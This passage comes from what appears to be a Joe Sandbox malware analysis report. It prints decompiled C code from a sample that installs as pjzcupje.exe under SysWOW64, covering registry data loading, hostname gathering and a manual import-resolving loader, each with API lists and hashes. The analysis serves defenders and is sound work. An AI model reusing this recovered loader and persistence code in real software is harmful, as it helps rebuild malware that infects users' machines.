                                                                                                                                  • wsprintfA.USER32 ref: 004090E9
                                                                                                                                  • CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2439722600-0
                                                                                                                                  • Opcode ID: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
                                                                                                                                  • Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
                                                                                                                                  • Opcode Fuzzy Hash: 428e34b473acadaeafd011e6997972491243de957368e91afa7baf983afb4ff9
                                                                                                                                  • Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040DD05 Relevance: 9.0, APIs: 6, Instructions: 34threadsleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}





                                                                                                                                  0x0040dd17
                                                                                                                                  0x0040dd41
                                                                                                                                  0x0040dd2c
                                                                                                                                  0x0040dd37
                                                                                                                                  0x0040dd4c
                                                                                                                                  0x0040dd39
                                                                                                                                  0x0040dd3b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040dd3b
                                                                                                                                  0x0040dd37
                                                                                                                                  0x0040dd53
                                                                                                                                  0x0040dd53
                                                                                                                                  0x0040dd59
                                                                                                                                  0x0040dd62
                                                                                                                                  0x0040dd68
                                                                                                                                  0x0040dd68
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040DD20
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040DD2E
                                                                                                                                  • Sleep.KERNEL32(00000000,?,761B43E0,?,00000000,0040E538,?,761B43E0,?,00000000,?,0040A445), ref: 0040DD3B
                                                                                                                                  • InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCurrentThreadTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3819781495-0
                                                                                                                                  • Opcode ID: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction ID: 5047c4a85d7ce053583ecb6bfb553561e79882e3d1eaa06aec664d00f8baf4e0
                                                                                                                                  • Opcode Fuzzy Hash: 00222842cf4b27377529e63430db8cbc0b0fb89ac28641eb4cfa7891be51bad4
                                                                                                                                  • Instruction Fuzzy Hash: 1AF0E971604204AFD7505FA5BC84BB53FA4EB48353F008077E109D22A8C77455898F2E
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004080C9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E004080C9(int* __ecx) {
				int _v8;
				void* _v12;
				int _v16;
				char _v20;
				char _v52;
				char _v312;
				void* _t27;
				void* _t31;
				char* _t35;
				char* _t42;
				char* _t45;
				intOrPtr* _t49;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t60;
				intOrPtr _t63;
				void* _t65;
				void* _t68;
				char _t70;
				intOrPtr _t71;

				_t56 = __ecx;
				_v8 = 0;
				 *0x412c3c = 0;
				 *0x412c38 = 0;
				if(E00406EC3() != 0) {
					_t27 = E0040704C(0x410264, 0, 0,  &_v312,  &_v52);
					_t65 = _t65 + 0x14;
					if(_t27 <= 0 || _v312 == 0 || _v52 == 0) {
						goto L20;
					} else {
						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t68 = _t65 + 0x14;
						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
							L19:
							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
							_t65 = _t68 + 0xc;
							goto L20;
						}
						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
							L15:
							_t42 =  *0x412c3c; // 0x0
							if(_t42 == 0) {
								goto L18;
							}
							E0040EC2E(_t42);
							 *0x412c3c = 0;
							goto L17;
						} else {
							_t45 = E0040EBCC(_v8);
							_pop(_t56);
							 *0x412c3c = _t45;
							if(_t45 == 0) {
								L18:
								RegCloseKey(_v12);
								goto L19;
							}
							_t56 =  &_v8;
							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
								goto L15;
							}
							_t49 =  &_v312;
							_t60 = _t49 + 1;
							do {
								_t57 =  *_t49;
								_t49 = _t49 + 1;
							} while (_t57 != 0);
							_t52 = E0040EBCC(_t49 - _t60 + 1);
							_pop(_t56);
							 *0x412c38 = _t52;
							if(_t52 == 0) {
								goto L18;
							}
							E0040EF00(_t52,  &_v312);
							L17:
							_pop(_t56);
							goto L18;
						}
					}
				} else {
					E00407EE6(_t56);
					L20:
					_t70 = "C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe"; // 0x43
					if(_t70 != 0) {
						_t71 =  *0x4121a4; // 0x0
						if(_t71 == 0) {
							_t31 = E0040675C("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v20, 0);
							_t61 = _t31;
							if(_t31 != 0) {
								_t63 = _v20;
								 *0x4122d4 = E004024C2(_t61, _t63, 0);
								 *0x4121a4 = _t63;
								E0040EC2E(_t61);
							}
						}
					}
					return 1;
				}
			}























                                                                                                                                  0x004080c9
                                                                                                                                  0x004080d7
                                                                                                                                  0x004080da
                                                                                                                                  0x004080e0
                                                                                                                                  0x004080ed
                                                                                                                                  0x0040810b
                                                                                                                                  0x00408110
                                                                                                                                  0x00408115
                                                                                                                                  0x00000000
                                                                                                                                  0x00408130
                                                                                                                                  0x00408151
                                                                                                                                  0x00408156
                                                                                                                                  0x00408167
                                                                                                                                  0x00408216
                                                                                                                                  0x0040821d
                                                                                                                                  0x00408222
                                                                                                                                  0x00000000
                                                                                                                                  0x00408222
                                                                                                                                  0x0040818b
                                                                                                                                  0x004081f7
                                                                                                                                  0x004081f7
                                                                                                                                  0x004081fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408201
                                                                                                                                  0x00408206
                                                                                                                                  0x00000000
                                                                                                                                  0x00408198
                                                                                                                                  0x0040819b
                                                                                                                                  0x004081a0
                                                                                                                                  0x004081a1
                                                                                                                                  0x004081a8
                                                                                                                                  0x0040820d
                                                                                                                                  0x00408210
                                                                                                                                  0x00000000
                                                                                                                                  0x00408210
                                                                                                                                  0x004081aa
                                                                                                                                  0x004081c2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004081c4
                                                                                                                                  0x004081ca
                                                                                                                                  0x004081cd
                                                                                                                                  0x004081cd
                                                                                                                                  0x004081cf
                                                                                                                                  0x004081d0
                                                                                                                                  0x004081d8
                                                                                                                                  0x004081dd
                                                                                                                                  0x004081de
                                                                                                                                  0x004081e5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004081ef
                                                                                                                                  0x0040820c
                                                                                                                                  0x0040820c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040820c
                                                                                                                                  0x0040818b
                                                                                                                                  0x004080ef
                                                                                                                                  0x004080ef
                                                                                                                                  0x00408225
                                                                                                                                  0x00408225
                                                                                                                                  0x0040822b
                                                                                                                                  0x0040822d
                                                                                                                                  0x00408233
                                                                                                                                  0x0040823f
                                                                                                                                  0x00408244
                                                                                                                                  0x0040824b
                                                                                                                                  0x0040824d
                                                                                                                                  0x00408259
                                                                                                                                  0x0040825e
                                                                                                                                  0x00408264
                                                                                                                                  0x00408269
                                                                                                                                  0x0040824b
                                                                                                                                  0x00408233
                                                                                                                                  0x00408273
                                                                                                                                  0x00408273

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 0040815F
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408187
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 004081BE
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,761B43E0,00000000), ref: 00408210
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,761B43E0,00000000), ref: 0040677E
                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                    • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe
                                                                                                                                  • API String ID: 124786226-910841113
                                                                                                                                  • Opcode ID: 833b6f6b4857963d3a2341c58a33919d22809719a19123417b93185de41ca30e
                                                                                                                                  • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                                                                  • Opcode Fuzzy Hash: 833b6f6b4857963d3a2341c58a33919d22809719a19123417b93185de41ca30e
                                                                                                                                  • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D474 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 0$9
                                                                                                                                  • API String ID: 3120068967-1975997740
                                                                                                                                  • Opcode ID: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction ID: 088c3d47d8d0274aa8753d7ba779fbf6fe5e7d9133052a4499599c1af462acad
                                                                                                                                  • Opcode Fuzzy Hash: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction Fuzzy Hash: D341F4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E85CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7F9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$9
                                                                                                                                  • API String ID: 3120068967-1823400153
                                                                                                                                  • Opcode ID: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction ID: 1c52575e259da486ba6c398081418c2db578d6301d08719f2cdf30cb48880645
                                                                                                                                  • Opcode Fuzzy Hash: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction Fuzzy Hash: 1D4116F1E001299FDB64CF49D841BAEB7B5FF85314F40459AD188AB241C7785E81CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040AD08 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55stringnetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}









                                                                                                                                  0x0040ad1c
                                                                                                                                  0x0040ad24
                                                                                                                                  0x0040ad71
                                                                                                                                  0x0040ad74
                                                                                                                                  0x0040ad77
                                                                                                                                  0x0040ad88
                                                                                                                                  0x0040ad88
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad7f
                                                                                                                                  0x0040ad26
                                                                                                                                  0x0040ad29
                                                                                                                                  0x0040ad2c
                                                                                                                                  0x0040ad2f
                                                                                                                                  0x0040ad55
                                                                                                                                  0x0040ad35
                                                                                                                                  0x0040ad3d
                                                                                                                                  0x0040ad45
                                                                                                                                  0x0040ad4d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad4d
                                                                                                                                  0x0040ad45
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad51
                                                                                                                                  0x0040ad52
                                                                                                                                  0x0040ad52
                                                                                                                                  0x0040ad53
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad53
                                                                                                                                  0x0040ad35
                                                                                                                                  0x0040ad60
                                                                                                                                  0x0040ad66
                                                                                                                                  0x0040ad69
                                                                                                                                  0x0040ad6b
                                                                                                                                  0x0040ad6b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$gethostnamelstrcpy
                                                                                                                                  • String ID: LocalHost
                                                                                                                                  • API String ID: 3695455745-3154191806
                                                                                                                                  • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                                                                  • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E3CA Relevance: 7.6, APIs: 5, Instructions: 136registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						_t75 =  *0x4136c4; // 0x0
						E00402544(_t75, _t75, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}
























                                                                                                                                  0x0040e3ca
                                                                                                                                  0x0040e3e0
                                                                                                                                  0x0040e3ee
                                                                                                                                  0x0040e528
                                                                                                                                  0x0040e52d
                                                                                                                                  0x0040e52d
                                                                                                                                  0x0040e3f4
                                                                                                                                  0x0040e3f9
                                                                                                                                  0x0040e3fb
                                                                                                                                  0x0040e3fb
                                                                                                                                  0x0040e3fe
                                                                                                                                  0x0040e3fe
                                                                                                                                  0x0040e400
                                                                                                                                  0x0040e401
                                                                                                                                  0x0040e407
                                                                                                                                  0x0040e409
                                                                                                                                  0x0040e40f
                                                                                                                                  0x0040e413
                                                                                                                                  0x0040e413
                                                                                                                                  0x0040e41c
                                                                                                                                  0x0040e421
                                                                                                                                  0x0040e429
                                                                                                                                  0x0040e42c
                                                                                                                                  0x0040e42f
                                                                                                                                  0x0040e43a
                                                                                                                                  0x0040e452
                                                                                                                                  0x0040e51d
                                                                                                                                  0x0040e520
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e45b
                                                                                                                                  0x0040e463
                                                                                                                                  0x0040e469
                                                                                                                                  0x0040e46e
                                                                                                                                  0x0040e484
                                                                                                                                  0x0040e48a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e491
                                                                                                                                  0x0040e494
                                                                                                                                  0x0040e499
                                                                                                                                  0x0040e4a1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4a3
                                                                                                                                  0x0040e4a6
                                                                                                                                  0x0040e4a9
                                                                                                                                  0x0040e4ae
                                                                                                                                  0x0040e4b4
                                                                                                                                  0x0040e4b9
                                                                                                                                  0x0040e4d3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4d5
                                                                                                                                  0x0040e4da
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4dc
                                                                                                                                  0x0040e4df
                                                                                                                                  0x0040e4e1
                                                                                                                                  0x0040e4e6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4e6
                                                                                                                                  0x0040e4e8
                                                                                                                                  0x0040e4ea
                                                                                                                                  0x0040e4ec
                                                                                                                                  0x0040e500
                                                                                                                                  0x0040e50e
                                                                                                                                  0x0040e516
                                                                                                                                  0x0040e516
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4ea

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                                                                  • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586453840-0
                                                                                                                                  • Opcode ID: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                                                                  • Opcode Fuzzy Hash: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406069 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
